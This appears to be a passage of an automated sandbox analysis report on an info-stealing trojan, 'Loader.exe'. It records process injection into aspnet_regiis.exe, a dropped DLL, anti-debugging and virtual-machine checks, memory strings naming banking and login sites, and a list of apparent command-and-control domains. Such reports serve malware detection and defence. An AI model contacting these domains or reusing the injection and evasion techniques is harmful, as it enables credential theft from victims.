              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D80705_2_6D7D8070
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CF8605_2_6D7CF860
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DE0605_2_6D7DE060
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D50305_2_6D7D5030
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D20105_2_6D7D2010
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CC0D05_2_6D7CC0D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D10C05_2_6D7D10C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CF3F05_2_6D7CF3F0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CB3F05_2_6D7CB3F0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DA3D05_2_6D7DA3D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D8BA05_2_6D7D8BA0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DC3905_2_6D7DC390
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DCA605_2_6D7DCA60
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D12505_2_6D7D1250
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CF2405_2_6D7CF240
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CEA105_2_6D7CEA10
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CCA005_2_6D7CCA00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D42F05_2_6D7D42F0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D32E05_2_6D7D32E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CAAC05_2_6D7CAAC0
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 6D7DEE80 appears 32 times
              Source: Loader.exe, 00000005.00000002.1292260994.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Loader.exe
              Source: Loader.exe, 00000005.00000000.1277412094.0000000000F62000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameOliviaQuinn.hwqT vs Loader.exe
              Source: Loader.exeBinary or memory string: OriginalFilenameOliviaQuinn.hwqT vs Loader.exe
              Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Loader.exeStatic PE information: Section: nS5 ZLIB complexity 1.0003297852983988
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@2/1
              Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
              Source: Loader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: aspnet_regiis.exe, 00000008.00000003.1330389387.000000000596D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1313796107.0000000005978000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1330799152.0000000005946000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1314274165.000000000595A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Loader.exeReversingLabs: Detection: 55%
              Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\Loader.exeUnpacked PE file: 5.2.Loader.exe.f00000.0.unpack nS5:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
              Source: Loader.exeStatic PE information: section name: nS5
              Source: Loader.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_00F5696B pushad ; ret 5_2_00F56976
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_00F58E8E push ss; ret 5_2_00F58F70
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7B5D3A push FFFFFFB9h; ret 5_2_6D7B5D3C
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7B5F50 push dword ptr [edx-166AE193h]; ret 5_2_6D7B5F5C
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7EB8C1 push ecx; ret 5_2_6D7EB8D4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B8AB6 push eax; ret 8_3_036B8AD1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B8AB6 push eax; ret 8_3_036B8AD1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B8AB6 push eax; ret 8_3_036B8AD1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B8AB6 push eax; ret 8_3_036B8AD1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036BFC60 push eax; iretd 8_3_036BFC69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036BFC60 push eax; iretd 8_3_036BFC69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036BFC60 push eax; iretd 8_3_036BFC69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036BFC60 push eax; iretd 8_3_036BFC69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036BFC60 push eax; iretd 8_3_036BFC69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036BFC60 push eax; iretd 8_3_036BFC69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_3_036B535F push esp; retf 8_3_036B5360
              Source: Loader.exeStatic PE information: section name: nS5 entropy: 7.99947521126159
              Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 7224, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 3050000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 51C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 58B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 68B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 69E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 79E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 7EB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 8EB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 9EB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
              Source: C:\Users\user\Desktop\Loader.exe TID: 7320Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7404Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7E4D44 FindFirstFileExW,5_2_6D7E4D44
              Source: C:\Users\user\Desktop\Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: aspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.00000000059A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: aspnet_regiis.exe, 00000008.00000003.1423102544.000000000360C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1424717867.000000000360C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_e
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: aspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DED57 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6D7DED57
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DED57 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6D7DED57
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7E2C9D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6D7E2C9D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DEA51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6D7DEA51
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Loader.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31F0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31F0000 value starts with: 4D5AJump to behavior
              Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: offybirhtdi.sbs
              Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: activedomest.sbs
              Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: arenbootk.sbs
              Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: mediavelk.sbs
              Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: definitib.sbs
              Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: elaboretib.sbs
              Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: strikebripm.sbs
              Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: ostracizez.sbs
              Source: Loader.exe, 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: withdrwblon.cyou
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31F0000Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31F1000Jump to behavior
